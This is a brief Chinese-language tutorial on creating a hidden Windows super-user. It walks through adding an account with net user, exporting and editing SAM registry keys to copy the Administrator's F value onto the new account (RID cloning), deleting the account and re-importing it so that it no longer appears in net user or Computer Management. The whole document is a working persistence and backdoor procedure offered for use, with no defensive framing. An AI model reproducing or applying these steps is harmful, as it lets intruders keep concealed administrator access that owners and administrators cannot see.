一
创建隐藏用户
net user beam$ 123 /add
二
win+r 键调出运行
输入 regedit 打开注册表编辑器
依次找到
HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users
图中 beam$ 用户对应的文件夹为 000003E9,Administrator 用户对应的文件夹为 000001F4,将beam$、000003E9 和 000001F4 这个三个文件夹导出,并用记事本打开。
如果遇到哪个文件夹打不开,右键文件夹 – 权限,将此时登录windows的用户添加进去,并设置成完全控制
三
将 000003E9 文件的 F 值,用 000001F4 文件的 F 值全部替换,并将替换后的 000003E9 文件与 beam$ 文件合并
四
删除隐藏用户
net user beam$ /del
五
将合并后的 beam$ 文件导入到注册表中
此时,隐藏的超级用户便创建完成,在计算机管理的本地用户中和 net user 下皆看不到。
PS:
- 创建完成后不能更改密码,如果使用 net user 修改密码,则会在本地用户中出现,并且不能删除;
- 如果再导出注册表之前 Administrator 用户是禁用状态,因为 F 键的值是复制的原因,创建的隐藏用户也会是禁用状态。